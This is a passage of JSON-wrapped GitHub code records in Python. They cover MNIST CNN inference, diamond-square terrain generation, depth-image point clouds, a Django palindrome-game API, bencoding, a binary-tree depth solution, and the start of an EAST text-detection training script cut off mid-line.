os\nsys.path.append(os.pardir) # 부모 디렉터리의 파일을 가져올 수 있도록 설정\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom dataset.mnist import load_mnist\nfrom simple_convnet import SimpleConvNet\nfrom common.trainer import Trainer\n\n# 데이터 읽기\n(x_train, t_train), (x_test, t_test) = load_mnist(flatten=False)\n\n# 시간이 오래 걸릴 경우 데이터를 줄인다.\n#x_train, t_train = x_train[:5000], t_train[:5000]\n#x_test, t_test = x_test[:1000], t_test[:1000]\n\nmax_epochs = 20\n\nnetwork = SimpleConvNet(input_dim=(1,28,28), \n conv_param = {'filter_num': 30, 'filter_size': 5, 'pad': 0, 'stride': 1},\n hidden_size=100, output_size=10, weight_init_std=0.01)\n\n# 파라미터 저장\npath_dir = './ckpt'\nfile_name = \"simple_convnet_params.pkl\"\nif not os.path.isdir(path_dir):\n os.mkdir(path_dir)\n\nprint(\"Load Network Parameters!\")\nnetwork.load_params(os.path.join(path_dir, file_name))\n\ntest_acc = network.accuracy(x_test, t_test)\nprint(\"test acc | \", format(test_acc*100, \".2f\"), '%')\n", "repo_name": "idsdlab/basicai_fa23", "sub_path": "week13_lab/mnist/inference_simple_convnet_mnist.py", "file_name": "inference_simple_convnet_mnist.py", "file_ext": "py", "file_size_in_byte": 1099, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "os.pardir", "line_number": 3, "usage_type": "attribute"}, {"api_name": "dataset.mnist.load_mnist", "line_number": 11, "usage_type": "call"}, {"api_name": "simple_convnet.SimpleConvNet", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}]} +{"seq_id": "35448366707", "text": "#!/usr/bin/python3\n\nimport argparse\nimport math\nimport random\n\nimport numpy\nfrom PIL import Image\n\ndef scaled_random(mag):\n return (2 * random.random() - 1.0) * mag\n\ndef diamond(array, x, y, size, mag):\n \"\"\"For each square in the array, set the midpoint of that square to be the\n average of the four corner points plus a random value.\n \"\"\"\n half = size // 2\n\n x1 = x + size\n y1 = y + size\n\n a = array[x, y]\n b = array[x1, y]\n c = array[x1, y1]\n d = array[x, y1]\n\n array[x + half, y + half] = (a + b + c + d) / 4.0 + scaled_random(mag)\n\ndef square(array, x, y, size, mag):\n \"\"\"For each diamond in the array, set the midpoint of that diamond to be\n the average of the four corner points plus a random value. \"\"\"\n\n x1 = x - size\n y1 = y - size\n x2 = x + size\n y2 = y + size\n\n div = 4.0\n\n l = len(array)\n\n if x1 >= 0:\n a = array[x1, y]\n else:\n a = 0.0\n div -= 1.0\n if y1 >= 0:\n b = array[x, y1]\n else:\n b = 0.0\n div -= 1.0\n if x2 < l:\n c = array[x2, y]\n else:\n c = 0.0\n div -= 1.0\n if y2 < l:\n d = array[x, y2]\n else:\n d = 0.0\n div -= 1.0\n\n if div:\n array[x, y] = (a + b + c + d) / div + scaled_random(mag)\n\ndef diamond_square(array, step, mag, red):\n if step < 2:\n return\n\n l = len(array) - 1\n half = step // 2\n\n for x in range(0, l, step):\n for y in range(0, l, step):\n diamond(array, x, y, step, mag)\n\n for x in range(0, l + 1, step):\n for y in range(0, l + 1, step):\n if x < l:\n square(array, x + half, y, half, mag)\n if y < l:\n square(array, x, y + half, half, mag)\n\n mag *= red\n\n diamond_square(array, half, mag, red)\n\ndef main():\n parser = argparse.ArgumentParser(\"Diamond-square terrain generator\")\n parser.add_argument(\"--seed\", type=int, default=None,\n help=\"Random seed\")\n parser.add_argument(\"--size\", type=int, default=256,\n help=\"Image size (rounded up to power of 2)\")\n parser.add_argument(\"filename\", nargs=1,\n help=\"Target file name\")\n args = parser.parse_args()\n\n if args.size < 2:\n args.size = 2\n else:\n args.size = 2 ** int(math.log2(args.size - 1) + 1)\n\n if args.seed:\n random.seed(args.seed)\n else:\n random.seed()\n\n array = numpy.zeros((args.size + 1, args.size + 1), dtype=numpy.float32)\n\n array[0,0] = scaled_random(2)\n array[0,args.size] = scaled_random(2)\n array[args.size,0] = scaled_random(2)\n array[args.size,args.size] = scaled_random(2)\n\n diamond_square(array, args.size, 1.0, 0.5)\n\n minimum = numpy.amin(array)\n maximum = numpy.amax(array)\n\n array -= minimum\n maximum -= minimum\n\n array = array * (255.0 / maximum)\n\n barray = numpy.array(array, dtype=numpy.ubyte)\n\n im = Image.frombuffer(\"L\", (args.size + 1, args.size + 1),\n memoryview(barray), \"raw\", \"L\", 0, 1)\n im = im.crop((0, 0, args.size, args.size))\n\n px = im.load()\n\n im.save(args.filename[0])\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "Jajcus/vulkanplay", "sub_path": "utils/diamond_square.py", "file_name": "diamond_square.py", "file_ext": "py", "file_size_in_byte": 3199, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.random", "line_number": 11, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 89, "usage_type": "call"}, {"api_name": "math.log2", "line_number": 101, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 104, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.amin", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.ubyte", "line_number": 125, "usage_type": "attribute"}, {"api_name": "PIL.Image.frombuffer", "line_number": 127, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 127, "usage_type": "name"}]} +{"seq_id": "32395300060", "text": "# TODO:给定图像的关键点坐标,根据深度相机得到三���空间坐标\n# 目的是为了模型注册\n\n# 输入: 图片\n# 输出: 3d点\n# 规定图像尺度为像素\n# 实际坐标的尺度为mm\n\nimport pyrealsense2 as rs\nfrom numpy import *\nimport numpy as np\n\nimport open3d as o3d\nimport cv2\n\nimport os\nimport time\nfrom enum import IntEnum\n\nfrom o3d_pose_lib import *\n\nnp.set_printoptions(suppress=True)\n\n\n# 这个是将整个深度图转为点云\ndef get_cloud_xyz(depth, scale, u0, v0, fx, fy):\n global xmap, ymap\n zmap = depth.flatten()\n\n print('xmap:', xmap.shape)\n print('ymap:', ymap.shape)\n print('zmap:', zmap.shape)\n\n # Z = zmap * scale\n Z = zmap\n X = (xmap - v0) * Z / fx\n Y = (ymap - u0) * Z / fy\n\n X = X[:, newaxis].astype(np.float32)\n Y = Y[:, newaxis].astype(np.float32)\n Z = Z[:, newaxis].astype(np.float32)\n\n cloud = np.concatenate((X, Y, Z), axis=1)\n\n return cloud\n\n\n# 添加颜色 问题:有一点对齐误差\ndef get_cloud_xyzrgb(depth, color, scale, u0, v0, fx, fy):\n global xmap, ymap\n\n # zmap = depth.flatten()\n zmap = depth.reshape(-1)\n # Z = zmap * scale # 乘 就变成了m为单位\n Z = zmap\n Y = (xmap - v0) * Z / fy # 因为检索时xy实际上是y行x列\n X = (ymap - u0) * Z / fx\n\n X = X[:, newaxis].astype(np.float32) # 可以优化\n Y = Y[:, newaxis].astype(np.float32)\n Z = Z[:, newaxis].astype(np.float32)\n cloud = np.concatenate((X, Y, Z), axis=1) # 拼接坐标\n\n # colors\n rgbs = color.reshape(-1, 3)\n\n return cloud, rgbs / 255\n\n\n# 将单个xyZ转为XYZ 图像坐标-》相机坐标\ndef get_xyz(pix, Z, u0, v0, fx, fy): # (x,y)\n Y = (pix[0] - v0) / fy * Z\n X = (pix[1] - u0) / fx * Z\n pt_w = np.array([X, Y, Z])\n return pt_w\n\n\nif __name__ == \"__main__\":\n\n # 参数设置\n\n # 画幅\n # width = 1280\n # height = 720\n\n width = 512\n height = 424\n\n # 最简单的测试:给定一个xyz,得到XYZ\n # 像素坐标映射\n xmap, ymap = mgrid[0:height, 0:width] # 前面是行范围 后面是列范围 对应到图像坐标,则xmap是y范围\n xmap, ymap = xmap.flatten(), ymap.flatten()\n\n # Getting the depth sensor's depth scale (see rs-align example for explanation)\n depth_scale = 0.001\n print('depth_scale:', depth_scale)\n\n # We will not display the background of objects more than\n # clipping_distance_in_meters meters away\n clipping_distance_in_meters = 3 # 阈值 meter\n clipping_distance = clipping_distance_in_meters / depth_scale\n\n # Create an align object\n # align_to = rs.stream.color # 将depth对齐到color\n # align = rs.align(align_to)\n\n # 内参 ----------------------\n # intrinsic = get_intrinsic_matrix(color_frame)\n # print(intrinsic)\n # u0, v0 = intrinsic.ppx, intrinsic.ppy\n # fx, fy = intrinsic.fx, intrinsic.fy\n u0, v0 = width / 2, height / 2\n fx, fy = 0.001, 0.001\n\n dist_coeffs = zeros((4, 1)) # Assuming no lens distortion\n\n # 保存内参\n # intrinsic_mat = np.array([[fx, 0, u0],\n # [0, fy, v0],\n # [0, 0, 1]])\n\n # OPEN3D begain ---------------------\n vis = o3d.visualization.Visualizer()\n vis.create_window(window_name='ANTenna3D')\n\n # 设置窗口背景颜色\n opt = vis.get_render_option()\n opt.background_color = np.asarray([0, 0., 0.0]) # up to 1\n # print(dir(opt))\n\n pcd = o3d.geometry.PointCloud()\n flip_transform = [[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]]\n\n coord = o3d.geometry.TriangleMesh.create_coordinate_frame(origin=[0, 0, 0], size=0.1) # 坐标系\n coord.transform(flip_transform)\n # OPEN3D end\n\n # Streaming loop\n frame_count = 0\n\n # while True:\n for frame_idx in range(1):\n\n s_time = time.time()\n\n frame_path = 'D:/SIA/Dataset/Kinect2/depth/1.bmp'\n\n # Align the depth frame to color frame\n # aligned_frames = align.process(frames)\n\n # 对齐 rgbd\n # 加载\n depth_img = cv2.imread(frame_path, 0)\n print(depth_img)\n print(shape(depth_img))\n\n # 整个点云\n pts = get_cloud_xyz(depth_img, depth_scale, u0, v0, fx, fy)\n # pts, color = get_cloud_xyzrgb(depth_img, rgb_img, depth_scale, u0, v0, fx, fy)\n # print(pts.shape)\n\n # # 使用open3d 查看效果\n pcd.points = o3d.utility.Vector3dVector(pts) # 效率极低! 30FPS -》 2.7FPS。。。\n # pcd.colors = o3d.utility.Vector3dVector(color)\n\n # show_pcd(pcd)\n\n # 写文件\n o3d.io.write_point_cloud(str(frame_count) + '.ply', pcd)\n\n pcd.transform(flip_transform)\n\n if frame_count == 0:\n vis.add_geometry(pcd)\n vis.add_geometry(coord)\n\n vis.update_geometry(pcd)\n vis.poll_events()\n vis.update_renderer()\n\n frame_count += 1\n\n delta_time = time.time() - s_time\n print('FPS:', 1/delta_time)\n", "repo_name": "antenna-fast/PoseEstimation", "sub_path": "dataset/real_camera/depth_to_pcd.py", "file_name": "depth_to_pcd.py", "file_ext": "py", "file_size_in_byte": 4976, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.set_printoptions", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 74, "usage_type": "call"}, {"api_name": "open3d.visualization.Visualizer", "line_number": 123, "usage_type": "call"}, {"api_name": "open3d.visualization", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 128, "usage_type": "call"}, {"api_name": "open3d.geometry.PointCloud", "line_number": 131, "usage_type": "call"}, {"api_name": "open3d.geometry", "line_number": 131, "usage_type": "attribute"}, {"api_name": "open3d.geometry.TriangleMesh.create_coordinate_frame", "line_number": 134, "usage_type": "call"}, {"api_name": "open3d.geometry", "line_number": 134, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 144, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 153, "usage_type": "call"}, {"api_name": "open3d.utility.Vector3dVector", "line_number": 163, "usage_type": "call"}, {"api_name": "open3d.utility", "line_number": 163, "usage_type": "attribute"}, {"api_name": "open3d.io.write_point_cloud", "line_number": 169, "usage_type": "call"}, {"api_name": "open3d.io", "line_number": 169, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 183, "usage_type": "call"}]} +{"seq_id": "32477861647", "text": "from django.contrib.auth.models import User as auth_user\nfrom django.http import JsonResponse\nimport json\nfrom random import randint\n\nfrom .models import *\n\n# Create your views here.\n\ndef get_session_obj(token):\n return Session.objects.filter(token = token).first()\n\ndef check_session(session):\n return (session is None) or (not session.status)\n\ndef create_new_user(request):\n if request.method == 'POST':\n payload = json.loads(request.body)\n user_name = payload['name']\n user_email = payload['email']\n user_password = payload['password']\n\n isUserExists = auth_user.objects.filter(email=user_email).first()\n if isUserExists:\n return JsonResponse({'status':'User Already Exists'})\n else:\n new_auth_user = auth_user.objects.create_user(username = user_name, email=user_email, password=user_password)\n if new_auth_user:\n new_user = User()\n new_user.to_db(payload)\n new_user.save()\n return JsonResponse({'status':'User Created Successfully'})\n else:\n return JsonResponse({'status':'Failed to Create New User'})\n \n else:\n return JsonResponse({'status':'Invalid Request Method, only POST Method is Allowed'})\n\ndef update_user(request):\n if request.method == 'POST':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n payload = json.loads(request.body)\n user_obj = User.objects.filter(id = session_obj.user.id).first()\n user_obj.to_db(payload)\n user_obj.save()\n return JsonResponse({'status': 'User Details Updated Successfully'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n\ndef delete_user(request):\n if request.method == 'POST':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n auth_obj = auth_user.objects.filter(email = session_obj.user.email)\n auth_obj.delete()\n\n user_obj = User.objects.filter(id = session_obj.user.id).first()\n user_obj.delete()\n return JsonResponse({'status': 'User Deleted Successfully'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n\ndef login_user(request):\n if request.method == 'POST':\n payload = json.loads(request.body)\n user_email = payload['email']\n user_password = payload['password']\n\n auth_obj = auth_user.objects.filter(email = user_email).first()\n if auth_obj is not None:\n user_obj = User.objects.filter(email = user_email).first()\n session_obj = Session.objects.filter(user = user_obj).first()\n if session_obj is None:\n token = randint(1000, 9999)\n data = {'token': token, 'status': True, 'user': user_obj}\n\n session_obj = Session()\n session_obj.to_db(data)\n session_obj.save()\n return JsonResponse({'status': 'User Logged in Successfully', 'token': token})\n \n else:\n if session_obj.status:\n return JsonResponse({'status': 'User Already Logged in'})\n else:\n session_obj.status = True\n session_obj.save()\n return JsonResponse({'status': 'User Logged in Successfully', 'token': session_obj.token})\n \n else:\n return JsonResponse({'status': 'User Does Not Exist'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n \ndef logout_user(request):\n if request.method == 'POST':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n session_obj.status = False\n session_obj.save()\n return JsonResponse({'status': 'User Logged out Successfully'})\n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n\ndef check_palindrome(string):\n return string == string[::-1]\n\ndef start_game(request):\n if request.method == 'GET':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n game = Game.objects.filter(session = session_obj).first()\n if game is not None:\n game.status = False\n game.save()\n \n new_game = Game()\n new_game.session = session_obj\n new_game.save()\n return JsonResponse({'status':'Game Started Successfully'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only GET Method is Allowed'})\n\ndef get_board(request):\n if request.method == 'GET':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n game_obj = Game.objects.filter(session = session_obj).first()\n return JsonResponse({'string': game_obj.game_string})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only GET Method is Allowed'})\n\ndef update_board(request):\n if request.method == 'POST':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n game_obj = Game.objects.filter(session = session_obj).first()\n if len(game_obj.game_string) == 6:\n is_palindrome = check_palindrome(game_obj.game_string)\n game_obj.is_palindrome = is_palindrome\n game_obj.save()\n return JsonResponse({'status': 'Game String is a Palindrome (Cannot Update the Board Anymore)' if is_palindrome else 'Game String is not a Palindrome (Cannot Update the Board Anymore)'})\n else:\n payload = json.loads(request.body)\n game_obj.game_string = game_obj.game_string + payload['char'][0]\n game_obj.save()\n return JsonResponse({'status': 'Updated Game Board'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n \ndef get_game_list(request):\n if request.method == 'GET':\n games = Game.objects.all()\n game_ids = []\n for each_game in games:\n print(each_game)\n game_ids.append(each_game.pk)\n return JsonResponse({'Games IDs': game_ids})\n else:\n return JsonResponse({'status': 'Invalid Request Method, Only GET Method is Allowed'})\n", "repo_name": "laminarss/palindrome-game-django", "sub_path": "project_palindrome/app_game/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7282, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.loads", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 23, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 25, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.create_user", "line_number": 27, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 27, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 32, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 34, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 37, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 44, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 46, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 50, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 53, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 60, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 62, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 62, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 67, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 70, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 74, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 78, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 78, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 78, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 83, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 89, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 93, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 97, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 100, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 103, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 110, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 114, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 116, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 126, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 136, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 139, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 146, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 149, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 152, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 159, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 166, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 168, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 171, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 174, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 183, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 185, "usage_type": "call"}]} +{"seq_id": "28973881098", "text": "#readFromSql.py\nimport pandas as pd\nimport sqlalchemy as alc\nimport urllib\n\ndef getFromSql (tableName):\n params = urllib.parse.quote_plus(\n 'DRIVER={SQL Server};'+\n 'SERVER=DESKTOP-SQU7IEK;'+\n 'DATABASE=pfizer;'+\n 'Trusted_Connection=yes'\n )\n engine = alc.create_engine(\"mssql+pyodbc:///?odbc_connect=%s\" % params)\n\n df = pd.read_sql(tableName, con=engine)\n return df\n\n \n\n ", "repo_name": "PerlantidisStefanos/simple_flask_communication", "sub_path": "readFromSql.py", "file_name": "readFromSql.py", "file_ext": "py", "file_size_in_byte": 404, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urllib.parse.quote_plus", "line_number": 7, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sqlalchemy.create_engine", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "19175112182", "text": "import typing\nfrom lbry.dht.error import DecodeError\n\n\ndef _bencode(data: typing.Union[int, bytes, bytearray, str, list, tuple, dict]) -> bytes:\n if isinstance(data, int):\n return b'i%de' % data\n elif isinstance(data, (bytes, bytearray)):\n return b'%d:%s' % (len(data), data)\n elif isinstance(data, str):\n return b'%d:%s' % (len(data), data.encode())\n elif isinstance(data, (list, tuple)):\n encoded_list_items = b''\n for item in data:\n encoded_list_items += _bencode(item)\n return b'l%se' % encoded_list_items\n elif isinstance(data, dict):\n encoded_dict_items = b''\n keys = data.keys()\n for key in sorted(keys):\n encoded_dict_items += _bencode(key)\n encoded_dict_items += _bencode(data[key])\n return b'd%se' % encoded_dict_items\n else:\n raise TypeError(f\"Cannot bencode {type(data)}\")\n\n\ndef _bdecode(data: bytes, start_index: int = 0) -> typing.Tuple[typing.Union[int, bytes, list, tuple, dict], int]:\n if data[start_index] == ord('i'):\n end_pos = data[start_index:].find(b'e') + start_index\n return int(data[start_index + 1:end_pos]), end_pos + 1\n elif data[start_index] == ord('l'):\n start_index += 1\n decoded_list = []\n while data[start_index] != ord('e'):\n list_data, start_index = _bdecode(data, start_index)\n decoded_list.append(list_data)\n return decoded_list, start_index + 1\n elif data[start_index] == ord('d'):\n start_index += 1\n decoded_dict = {}\n while data[start_index] != ord('e'):\n key, start_index = _bdecode(data, start_index)\n value, start_index = _bdecode(data, start_index)\n decoded_dict[key] = value\n return decoded_dict, start_index\n else:\n split_pos = data[start_index:].find(b':') + start_index\n try:\n length = int(data[start_index:split_pos])\n except (ValueError, TypeError) as err:\n raise DecodeError(err)\n start_index = split_pos + 1\n end_pos = start_index + length\n return data[start_index:end_pos], end_pos\n\n\ndef bencode(data: typing.Dict) -> bytes:\n if not isinstance(data, dict):\n raise TypeError()\n return _bencode(data)\n\n\ndef bdecode(data: bytes, allow_non_dict_return: typing.Optional[bool] = False) -> typing.Dict:\n assert isinstance(data, bytes), DecodeError(f\"invalid data type: {str(type(data))}\")\n\n if len(data) == 0:\n raise DecodeError('Cannot decode empty string')\n try:\n result = _bdecode(data)[0]\n if not allow_non_dict_return and not isinstance(result, dict):\n raise ValueError(f'expected dict, got {type(result)}')\n return result\n except (ValueError, TypeError) as err:\n raise DecodeError(err)\n", "repo_name": "lbryio/lbry-sdk", "sub_path": "lbry/dht/serialization/bencoding.py", "file_name": "bencoding.py", "file_ext": "py", "file_size_in_byte": 2839, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7218, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.Union", "line_number": 5, "usage_type": "attribute"}, {"api_name": "lbry.dht.error.DecodeError", "line_number": 52, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 28, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 28, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 58, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 64, "usage_type": "attribute"}, {"api_name": "lbry.dht.error.DecodeError", "line_number": 65, "usage_type": "call"}, {"api_name": "lbry.dht.error.DecodeError", "line_number": 68, "usage_type": "call"}, {"api_name": "lbry.dht.error.DecodeError", "line_number": 75, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 64, "usage_type": "attribute"}]} +{"seq_id": "21757375059", "text": "# -*- coding:utf-8 -*-\n# author: hpf\n# create time: 2020/10/22 9:38\n# file: 111_二叉树的最小深度.py\n# IDE: PyCharm\n\n# 题目描述:\n# 给定一个二叉树,找出其最小深度。\n#\n# 最小深度是从根节点到最近叶子节点的最短路径上的节点数量。\n#\n# 说明: 叶子节点是指没有子节点的节点。\n#\n# 示例:\n#\n# 给定二叉树 [3,9,20,null,null,15,7],\n#\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n# 返回它的最小深度  2.\n\n# 解法一: BFS\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution1:\n def minDepth(self, root: TreeNode) -> int:\n if not root:\n return 0\n\n from collections import deque\n q = deque()\n\n # root本身就是一层,depth初始化为1\n q.append(root)\n depth = 1\n\n while(q):\n size = len(q)\n # 将当前队列中的所有节点向四周扩散\n for _ in range(size):\n node = q.popleft()\n # 判断是否到达终点\n if not node.left and not node.right:\n return depth\n # 将node的相邻节点��入队列\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n # 这里增加步数\n depth += 1\n\n return depth\n\n# 解法二: DFS\n\n# 先看使用 DFS(深度优先搜索)的方法,具体做法如下:\n#\n# 根节点为空,返回 0;\n# 如果根节点不为空,需要判断左右子节点:\n# 左右子节点都为空,那么返回 1;\n# 左右子节点其中一个为空,那么返回不为空子节点的最小深度;\n# 左右子节点均不为空,返回其中较小深度的值。\n\n\n\nclass Solution:\n def minDepth(self, root: TreeNode) -> int:\n # 根节点为空\n if not root:\n return 0\n # 根节点不为空,但不存在左右子节点,返回 1\n if not root.left and not root.right:\n return 1\n\n depth = 1\n\n # 返回不为空的右子节点最小深度\n if not root.left:\n depth += self.minDepth(root.right)\n # 不存在右子节点,返回不为空的左子节点最小深度\n elif not root.right:\n depth += self.minDepth(root.left)\n # 左右子节点均不为空,返回较小深度\n else:\n left_depth = self.minDepth(root.left)\n right_depth = self.minDepth(root.right)\n depth += min(left_depth, right_depth)\n\n return depth", "repo_name": "hpf0532/algorithms_demo", "sub_path": "leetcode/111_二叉树的最小深度.py", "file_name": "111_二叉树的最小深度.py", "file_ext": "py", "file_size_in_byte": 2702, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.deque", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "14474576552", "text": "# coding=utf-8\nimport mxnet as mx\nfrom mxnet import gluon, autograd\nimport gluoncv as gcv\nfrom model_zoo import east, EASTLoss, east_fpn\nfrom data.ic_data import text_detection_data\nfrom mxnet.gluon.data import DataLoader\nfrom mxnet.gluon import utils\nimport logging\nimport os, sys\nfrom mxboard import SummaryWriter\nimport numpy as np\nfrom mxnet import lr_scheduler as ls\n\nlogging.basicConfig(level=logging.INFO)\n\ndef main(train_dir, ctx=None, lr=0.0001, epoches=20, batch_size=16, checkpoint_path='model', debug=False):\n summ_writer = SummaryWriter(checkpoint_path)\n # dataloader\n ctx = eval(ctx)\n context = mx.gpu(ctx) if ctx > 0 else mx.cpu()\n ic_data = text_detection_data(image_dir=train_dir)\n ic_dataloader = DataLoader(dataset=ic_data, batch_size=batch_size, shuffle=True, num_workers=16)\n data_num = len(ic_dataloader) * batch_size\n # model\n east_model = east.EAST(nclass=2, text_scale=1024)\n # east_model = east(text_scale=1024)\n\n east_model.collect_params().initialize(init=mx.init.Xavier(), verbose=True, ctx=context)\n if not debug:\n east_model.hybridize()\n cos_shc = 